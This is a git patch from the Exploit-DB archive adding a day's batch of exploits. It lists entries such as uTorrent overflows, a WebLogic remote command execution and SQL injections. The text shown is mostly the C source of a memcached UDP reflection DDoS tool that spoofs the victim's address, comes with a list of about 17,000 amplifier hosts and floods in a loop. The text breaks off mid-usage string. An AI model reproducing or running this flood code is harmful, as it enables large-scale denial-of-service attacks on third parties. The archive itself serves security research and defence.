From 5947825a8490967127fbea0f782a3a40822947f8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 10 Mar 2018 05:01:50 +0000 Subject: [PATCH] DB: 2018-03-10 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 15 changes to exploits/shellcodes uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) uTorrent WebUI 0.370 - Authorisation Header Denial of Service μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service Memcached - 'memcrashed' Denial of Service Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2) Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1) Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service WebLog Expert Enterprise 9.4 - Denial of Service uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking uTorrent 2.0.3 - DLL Hijacking μTorrent (uTorrent) 2.0.3 - DLL Hijacking iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow Microsoft Office - 'Composite Moniker Remote Code Execution Mozilla Firefox - Address Bar Spoofing Tor (Firefox 41 < 50) - Code Execution Chrome 35.0.1916.153 - Sandbox Escape / Command Execution WebLog Expert Enterprise 9.4 - Authentication Bypass uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution Werkzeug - 'Debug Shell' Command Execution TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal toronja CMS - SQL Injection Toronja CMS - SQL Injection uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing TinyBrowser - 'tinybrowser.php' Directory Listing TinyBrowser - 'edit.php' Directory Listing Xoops 2.5.7.2 - Directory Traversal Bypass XOOPS 2.5.7.2 - Directory Traversal Bypass SAP BusinessObjects launch pad - Server-Side Request Forgery antMan < 0.9.1a - Authentication Bypass Bacula-Web < 8.0.0-rc2 - SQL Injection --- exploits/android/dos/44268.txt | 3 + exploits/linux/dos/44264.c | 228 ++++++++++++++++++++++++++++ exploits/linux/dos/44265.py | 170 +++++++++++++++++++++ exploits/multiple/local/44266.html | 3 + exploits/multiple/remote/43392.py | 61 ++++++++ exploits/multiple/remote/43905.py | 55 +++++++ exploits/multiple/webapps/43404.py | 99 ++++++++++++ exploits/multiple/webapps/44220.txt | 39 +++++ exploits/php/webapps/44272.txt | 55 +++++++ exploits/windows/dos/44271.py | 92 +++++++++++ exploits/windows/local/44224.py | 51 +++++++ exploits/windows/local/44263.md | 31 ++++ exploits/windows/local/44267.md | 12 ++ exploits/windows/local/44269.txt | 3 + exploits/windows/local/44270.txt | 91 +++++++++++ files_exploits.csv | 43 ++++-- 16 files changed, 1022 insertions(+), 14 deletions(-) create mode 100644 exploits/android/dos/44268.txt create mode 100644 exploits/linux/dos/44264.c create mode 100755 exploits/linux/dos/44265.py create mode 100644 exploits/multiple/local/44266.html create mode 100755 exploits/multiple/remote/43392.py create mode 100755 exploits/multiple/remote/43905.py create mode 100755 exploits/multiple/webapps/43404.py create mode 100644 exploits/multiple/webapps/44220.txt create mode 100644 exploits/php/webapps/44272.txt create mode 100755 exploits/windows/dos/44271.py create mode 100755 exploits/windows/local/44224.py create mode 100644 exploits/windows/local/44263.md create mode 100644 exploits/windows/local/44267.md create mode 100644 exploits/windows/local/44269.txt create mode 100644 exploits/windows/local/44270.txt diff --git a/exploits/android/dos/44268.txt b/exploits/android/dos/44268.txt new file mode 100644 index 000000000..e063c6b86 --- /dev/null +++ b/exploits/android/dos/44268.txt @@ -0,0 +1,3 @@ +This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/ + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44268.zip \ No newline at end of file diff --git a/exploits/linux/dos/44264.c b/exploits/linux/dos/44264.c new file mode 100644 index 000000000..1b7a3ce7f --- /dev/null +++ b/exploits/linux/dos/44264.c @@ -0,0 +1,228 @@ +/** +memcached-PoC + +memcached Proof of Concept Amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP hosts. + +memcached.c - Source code (https://pastebin.com/raw/ZiUeinae) +memecache-amp-03-05-2018-rd.list - List of memcached servers as of 03-05-2018 (https://pastebin.com/raw/eSCHTTVu) + +Compile: gcc memcached.c -o memecached -pthread + +*Educational and/or testing purposes only. *Use of these tools against an unauthorized party may be unethtical, rude, and even illegal in some countries. + +**/ + +/* + memcache reflection script + greeting: syn, storm, krashed, chrono, spike, niko, disliked + Use with extreme Caution +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define MAX_PACKET_SIZE 8192 +#define PHI 0x9e3779b9 +static uint32_t Q[4096], c = 362436; +struct list +{ + struct sockaddr_in data; + struct list *next; + struct list *prev; +}; +struct list *head; +volatile int tehport; +volatile int limiter; +volatile unsigned int pps; +volatile unsigned int sleeptime = 100; +struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; }; +void init_rand(uint32_t x) +{ + int i; + Q[0] = x; + Q[1] = x + PHI; + Q[2] = x + PHI + PHI; + for (i = 3; i < 4096; i++) + { + Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; + } +} +uint32_t rand_cmwc(void) +{ + uint64_t t, a = 18782LL; + static uint32_t i = 4095; + uint32_t x, r = 0xfffffffe; + i = (i + 1) & 4095; + t = a * Q[i] + c; + c = (t >> 32); + x = t + c; + if (x < c) { + x++; + c++; + } + return (Q[i] = r - x); +} +unsigned short csum (unsigned short *buf, int nwords) +{ + unsigned long sum = 0; + for (sum = 0; nwords > 0; nwords--) + sum += *buf++; + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + return (unsigned short)(~sum); +} +void setup_ip_header(struct iphdr *iph) +{ + iph->ihl = 5; + iph->version = 4; + iph->tos = 0; + iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 15; + iph->id = htonl(54321); + iph->frag_off = 0; + iph->ttl = MAXTTL; + iph->protocol = IPPROTO_UDP; + iph->check = 0; + iph->saddr = inet_addr("192.168.3.100"); +} +void setup_udp_header(struct udphdr *udph) +{ + udph->source = htons(5678); + udph->dest = htons(11211); + udph->check = 0; + memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15); + udph->len=htons(sizeof(struct udphdr) + 15); +} +void *flood(void *par1) +{ + struct thread_data *td = (struct thread_data *)par1; + char datagram[MAX_PACKET_SIZE]; + struct iphdr *iph = (struct iphdr *)datagram; + struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr); + struct sockaddr_in sin = td->sin; + struct list *list_node = td->list_node; + int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); + if(s < 0){ + fprintf(stderr, "Could not open raw socket.\n"); + exit(-1); + } + init_rand(time(NULL)); + memset(datagram, 0, MAX_PACKET_SIZE); + setup_ip_header(iph); + setup_udp_header(udph); + udph->source = htons(rand() % 65535 - 1026); + iph->saddr = sin.sin_addr.s_addr; + iph->daddr = list_node->data.sin_addr.s_addr; + iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); + int tmp = 1; + const int *val = &tmp; + if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ + fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); + exit(-1); + } + init_rand(time(NULL)); + register unsigned int i; + i = 0; + while(1){ + sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data)); + list_node = list_node->next; + iph->daddr = list_node->data.sin_addr.s_addr; + iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); + iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); + + pps++; + if(i >= limiter) + { + i = 0; + usleep(sleeptime); + } + i++; + } +} +int main(int argc, char *argv[ ]) +{ + if(argc < 6){ + fprintf(stderr, "Invalid parameters!\n"); + fprintf(stdout, "Usage: %s